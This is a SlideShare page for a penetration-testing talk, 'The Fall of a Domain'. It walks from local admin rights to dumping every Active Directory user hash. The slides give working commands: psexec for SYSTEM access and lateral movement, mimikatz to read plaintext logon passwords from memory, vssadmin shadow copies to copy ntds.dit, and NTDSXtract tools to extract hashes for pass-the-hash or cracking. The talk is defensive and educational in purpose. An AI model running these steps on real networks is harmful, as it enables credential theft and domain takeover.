SlideShare ist ein Scribd-Unternehmen logo
1 von 23
Downloaden Sie, um offline zu lesen
The Fall of a Domain
LOCAL ADMIN TO DOMAIN USER HASHES

Riyaz Walikar
Disclaimer
 It was far more painstaking and complicated than

this!
 Demo setup to show execution path
 All the commands were actually used in the pentest

 Please do not try this on your office/corporate

environment without written permission
Please exercise caution!
The story so far
 Remote RDP access to a machine on the client

network via VPN
 Local Administrator rights to simulate an employee
 User is a limited domain user

 Domain controller on the same network, reachable

with LDAP services running
Visually. This.
Local Admin eh?
 Locally logged in as TARDISfwhite
 Domain limited user but local admin
 Other users connected? [Task Manager > Users]
 Found another user connected to our system via

RDP –sweet! (possibly domain admin )
 Need system privs! Any ideas?
Think Sysinternals!
 psexec –s –i cmd.exe
Dump connected user credentials
 mimikatz – Benjamin Delpy
 Extracts plaintext passwords from memory
 Wdigest, tspkg, kerberos and many more
 mimikatz
 privilege::debug
 token::elevate
 sekurlsa::logonPasswords
Windows (In)Security?
Now what?

http://gapingvoid.com/2008/06/13/now-what/
Remote CMD anyone?
 RDP directly!
 Lets be discreet 
 psexec -s –u TARDISatomboy 10.10.10.1 cmd.exe
 Game already over!
 Instead RDP with user credentials and present

report
Fall of a domain | From local admin to Domain user hashes
Lets grab some hashes 
 Active Directory stores user information in

%systemroot%ntdsntds.dit
 Locked during system usage
 ntdsutil + snapshot = backup (> Windows 2008)

 vssadmin create shadow /for=C: (> Windows 2003)
Lets grab some hashes 
 backup readable by nt authoritysystem and

administrators
 We need the ntds.dit and SYSTEM files
 cd / dir /other inbuilt cmd commands do not work

on unmounted volume shadow copies
 copy works!
Core files needed
NTDS.dit structure parse?
 NTDSXtract - A framework for offline forensic

analysis of ntds.dit
 Need the libesedb module as well
 libesedb and creddump in ntds_dump_hashes.zip

 wget to a linux box (Kali is a good choice)
get framework + compile + make + run
 wget

http://ntdsxtract.com/downloads/ntdsxtract/ntdsxt
ract_v1_0.zip
 wget

http://ntdsxtract.com/downloads/ntds_dump_hash
.zip
 unzip both
get framework + compile + make + run
 cd ntds_dump_hash/libesedb
 ./configure && make
 cd libesedb/esedbtools
 ./esedbexport -l /tmp/ntds.log <ntds.dit>
Yay!
 python ../../ntdsxtract/dsusers.py datatable

link_table --passwordhashes <system_file> –
passwordhistory <system_file>
 Cleanup the output with ntdstopwdump.py

(https://raw.github.com/inquisb/miscellaneous/mas
ter/ntdstopwdump.py)
Now what?

http://gapingvoid.com/2008/06/13/now-what/
Pass the hash / Password Cracking!
 Use the Windows Credentials Editor – Amplia

Security
 Password Cracking >> Humla perhaps 
References
 http://blog.gentilkiwi.com/mimikatz
 http://www.ampliasecurity.com/research/wcefaq.ht

ml
 http://bernardodamele.blogspot.in/2011/12/dumpwindows-password-hashes_16.html
Thank you

riyazwalikar@gmail.com
http://www.riyazwalikar.com

Weitere ähnliche Inhalte

Was ist angesagt?

IBM Traveler Management, Security and Performance
IBM Traveler Management, Security and PerformanceIBM Traveler Management, Security and Performance
IBM Traveler Management, Security and PerformanceGabriella Davis
 
Practical Introduction To Linux
Practical Introduction To LinuxPractical Introduction To Linux
Practical Introduction To LinuxZeeshan Rizvi
 
Xen & the Art of Virtualization
Xen & the Art of VirtualizationXen & the Art of Virtualization
Xen & the Art of VirtualizationTareque Hossain
 
Lavigne bsdmag march12
Lavigne bsdmag march12Lavigne bsdmag march12
Lavigne bsdmag march12Dru Lavigne
 
Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...
Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...
Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...Виталий Стародубцев
 

Was ist angesagt? (8)

IBM Traveler Management, Security and Performance
IBM Traveler Management, Security and PerformanceIBM Traveler Management, Security and Performance
IBM Traveler Management, Security and Performance
 
Practical Introduction To Linux
Practical Introduction To LinuxPractical Introduction To Linux
Practical Introduction To Linux
 
HDFS Basics
HDFS BasicsHDFS Basics
HDFS Basics
 
Xen & the Art of Virtualization
Xen & the Art of VirtualizationXen & the Art of Virtualization
Xen & the Art of Virtualization
 
P3
P3P3
P3
 
Makarand_sonawane_2.6yrexp
Makarand_sonawane_2.6yrexpMakarand_sonawane_2.6yrexp
Makarand_sonawane_2.6yrexp
 
Lavigne bsdmag march12
Lavigne bsdmag march12Lavigne bsdmag march12
Lavigne bsdmag march12
 
Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...
Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...
Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...
 

Andere mochten auch

Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShellkieranjacobsen
 
Exploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShellExploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShellkieranjacobsen
 
Azure automation invades your data centre
Azure automation invades your data centreAzure automation invades your data centre
Azure automation invades your data centrekieranjacobsen
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShellkieranjacobsen
 
Fun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber DuckyFun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber Duckykieranjacobsen
 
Glen Sanford: Engineering for Real-Time at Twitter
Glen Sanford: Engineering for Real-Time at TwitterGlen Sanford: Engineering for Real-Time at Twitter
Glen Sanford: Engineering for Real-Time at Twitter9len
 
Http2 Security Perspective
Http2 Security PerspectiveHttp2 Security Perspective
Http2 Security PerspectiveSunil Kumar
 
Gospel of mark pt 1 session 02
Gospel of mark pt 1   session 02Gospel of mark pt 1   session 02
Gospel of mark pt 1 session 02Darryl Matthews
 
Mehta sv forum_mobileinternetsig
Mehta sv forum_mobileinternetsigMehta sv forum_mobileinternetsig
Mehta sv forum_mobileinternetsig3GDR
 

Andere mochten auch (10)

Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
 
Exploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShellExploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShell
 
Azure automation invades your data centre
Azure automation invades your data centreAzure automation invades your data centre
Azure automation invades your data centre
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
 
Fun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber DuckyFun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber Ducky
 
Glen Sanford: Engineering for Real-Time at Twitter
Glen Sanford: Engineering for Real-Time at TwitterGlen Sanford: Engineering for Real-Time at Twitter
Glen Sanford: Engineering for Real-Time at Twitter
 
Http2 Security Perspective
Http2 Security PerspectiveHttp2 Security Perspective
Http2 Security Perspective
 
Gospel of mark pt 1 session 02
Gospel of mark pt 1   session 02Gospel of mark pt 1   session 02
Gospel of mark pt 1 session 02
 
Pentesting Cloud Environment
Pentesting Cloud EnvironmentPentesting Cloud Environment
Pentesting Cloud Environment
 
Mehta sv forum_mobileinternetsig
Mehta sv forum_mobileinternetsigMehta sv forum_mobileinternetsig
Mehta sv forum_mobileinternetsig
 

Ähnlich wie Fall of a domain | From local admin to Domain user hashes

Managing Drupal on Windows with Drush
Managing Drupal on Windows with DrushManaging Drupal on Windows with Drush
Managing Drupal on Windows with DrushAlessandro Pilotti
 
70-410 Practice Test
70-410 Practice Test70-410 Practice Test
70-410 Practice Testwrailebo
 
DevOps: Cooking Drupal Deployment
DevOps: Cooking Drupal DeploymentDevOps: Cooking Drupal Deployment
DevOps: Cooking Drupal DeploymentGerald Villorente
 
Project of deamon process
Project of deamon processProject of deamon process
Project of deamon processAbubakr Cheema
 
Server 2008 r2 ppt
Server 2008 r2 pptServer 2008 r2 ppt
Server 2008 r2 pptRaj Solanki
 
Automating Active Directory mgmt in PowerShell
Automating Active Directory mgmt in PowerShellAutomating Active Directory mgmt in PowerShell
Automating Active Directory mgmt in PowerShellConcentrated Technology
 
WinConnections Spring, 2011 - How to Securely Connect Remote Desktop Services...
WinConnections Spring, 2011 - How to Securely Connect Remote Desktop Services...WinConnections Spring, 2011 - How to Securely Connect Remote Desktop Services...
WinConnections Spring, 2011 - How to Securely Connect Remote Desktop Services...Concentrated Technology
 
Deploying Windows Containers on Windows Server 2016
Deploying Windows Containers on Windows Server 2016Deploying Windows Containers on Windows Server 2016
Deploying Windows Containers on Windows Server 2016Ben Hall
 
CEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptxCEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptxYasserOuda2
 
UGIF 12 2010 - features11.70
UGIF 12 2010 - features11.70UGIF 12 2010 - features11.70
UGIF 12 2010 - features11.70UGIF
 
Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7
Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7
Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7Nicolas Desachy
 
Oreilly Webcast 01 19 10
Oreilly Webcast 01 19 10Oreilly Webcast 01 19 10
Oreilly Webcast 01 19 10Sean Hull
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slidesDocker, Inc.
 
Ctive directory interview question and answers
Ctive directory interview question and answersCtive directory interview question and answers
Ctive directory interview question and answerssankar palla
 
RH_Summit_IdM_Lab_User_Guide_2015
RH_Summit_IdM_Lab_User_Guide_2015RH_Summit_IdM_Lab_User_Guide_2015
RH_Summit_IdM_Lab_User_Guide_2015Diaa Radwan
 
Sistemas operacionais 8
Sistemas operacionais 8Sistemas operacionais 8
Sistemas operacionais 8Nauber Gois
 

Ähnlich wie Fall of a domain | From local admin to Domain user hashes (20)

Windows server Interview question and answers
Windows server Interview question and answersWindows server Interview question and answers
Windows server Interview question and answers
 
Managing Drupal on Windows with Drush
Managing Drupal on Windows with DrushManaging Drupal on Windows with Drush
Managing Drupal on Windows with Drush
 
70-410 Practice Test
70-410 Practice Test70-410 Practice Test
70-410 Practice Test
 
DevOps: Cooking Drupal Deployment
DevOps: Cooking Drupal DeploymentDevOps: Cooking Drupal Deployment
DevOps: Cooking Drupal Deployment
 
Project of deamon process
Project of deamon processProject of deamon process
Project of deamon process
 
Server 2008 r2 ppt
Server 2008 r2 pptServer 2008 r2 ppt
Server 2008 r2 ppt
 
Server Core2
Server Core2Server Core2
Server Core2
 
Automating Active Directory mgmt in PowerShell
Automating Active Directory mgmt in PowerShellAutomating Active Directory mgmt in PowerShell
Automating Active Directory mgmt in PowerShell
 
WinConnections Spring, 2011 - How to Securely Connect Remote Desktop Services...
WinConnections Spring, 2011 - How to Securely Connect Remote Desktop Services...WinConnections Spring, 2011 - How to Securely Connect Remote Desktop Services...
WinConnections Spring, 2011 - How to Securely Connect Remote Desktop Services...
 
Deploying Windows Containers on Windows Server 2016
Deploying Windows Containers on Windows Server 2016Deploying Windows Containers on Windows Server 2016
Deploying Windows Containers on Windows Server 2016
 
CEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptxCEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptx
 
UGIF 12 2010 - features11.70
UGIF 12 2010 - features11.70UGIF 12 2010 - features11.70
UGIF 12 2010 - features11.70
 
Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7
Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7
Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7
 
Oreilly Webcast 01 19 10
Oreilly Webcast 01 19 10Oreilly Webcast 01 19 10
Oreilly Webcast 01 19 10
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
DFIR Training: RDP Triage
DFIR Training: RDP TriageDFIR Training: RDP Triage
DFIR Training: RDP Triage
 
Ctive directory interview question and answers
Ctive directory interview question and answersCtive directory interview question and answers
Ctive directory interview question and answers
 
linux
linuxlinux
linux
 
RH_Summit_IdM_Lab_User_Guide_2015
RH_Summit_IdM_Lab_User_Guide_2015RH_Summit_IdM_Lab_User_Guide_2015
RH_Summit_IdM_Lab_User_Guide_2015
 
Sistemas operacionais 8
Sistemas operacionais 8Sistemas operacionais 8
Sistemas operacionais 8
 

Mehr von n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

Mehr von n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Kürzlich hochgeladen

9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding TeamAdam Moalla
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAshyamraj55
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Brian Pichman
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-pyJamie (Taka) Wang
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintMahmoud Rabie
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureEric D. Schabell
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarPrecisely
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxMatsuo Lab
 

Kürzlich hochgeladen (20)

9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-py
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership Blueprint
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
201610817 - edge part1
201610817 - edge part1201610817 - edge part1
201610817 - edge part1
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 

Fall of a domain | From local admin to Domain user hashes

  • 1. The Fall of a Domain LOCAL ADMIN TO DOMAIN USER HASHES Riyaz Walikar
  • 2. Disclaimer  It was far more painstaking and complicated than this!  Demo setup to show execution path  All the commands were actually used in the pentest  Please do not try this on your office/corporate environment without written permission
  • 4. The story so far  Remote RDP access to a machine on the client network via VPN  Local Administrator rights to simulate an employee  User is a limited domain user  Domain controller on the same network, reachable with LDAP services running
  • 6. Local Admin eh?  Locally logged in as TARDISfwhite  Domain limited user but local admin  Other users connected? [Task Manager > Users]  Found another user connected to our system via RDP –sweet! (possibly domain admin )  Need system privs! Any ideas?
  • 7. Think Sysinternals!  psexec –s –i cmd.exe
  • 8. Dump connected user credentials  mimikatz – Benjamin Delpy  Extracts plaintext passwords from memory  Wdigest, tspkg, kerberos and many more  mimikatz  privilege::debug  token::elevate  sekurlsa::logonPasswords
  • 11. Remote CMD anyone?  RDP directly!  Lets be discreet   psexec -s –u TARDISatomboy 10.10.10.1 cmd.exe  Game already over!  Instead RDP with user credentials and present report
  • 13. Lets grab some hashes   Active Directory stores user information in %systemroot%ntdsntds.dit  Locked during system usage  ntdsutil + snapshot = backup (> Windows 2008)  vssadmin create shadow /for=C: (> Windows 2003)
  • 14. Lets grab some hashes   backup readable by nt authoritysystem and administrators  We need the ntds.dit and SYSTEM files  cd / dir /other inbuilt cmd commands do not work on unmounted volume shadow copies  copy works!
  • 16. NTDS.dit structure parse?  NTDSXtract - A framework for offline forensic analysis of ntds.dit  Need the libesedb module as well  libesedb and creddump in ntds_dump_hashes.zip  wget to a linux box (Kali is a good choice)
  • 17. get framework + compile + make + run  wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxt ract_v1_0.zip  wget http://ntdsxtract.com/downloads/ntds_dump_hash .zip  unzip both
  • 18. get framework + compile + make + run  cd ntds_dump_hash/libesedb  ./configure && make  cd libesedb/esedbtools  ./esedbexport -l /tmp/ntds.log <ntds.dit>
  • 19. Yay!  python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> – passwordhistory <system_file>  Cleanup the output with ntdstopwdump.py (https://raw.github.com/inquisb/miscellaneous/mas ter/ntdstopwdump.py)
  • 21. Pass the hash / Password Cracking!  Use the Windows Credentials Editor – Amplia Security  Password Cracking >> Humla perhaps 
  • 22. References  http://blog.gentilkiwi.com/mimikatz  http://www.ampliasecurity.com/research/wcefaq.ht ml  http://bernardodamele.blogspot.in/2011/12/dumpwindows-password-hashes_16.html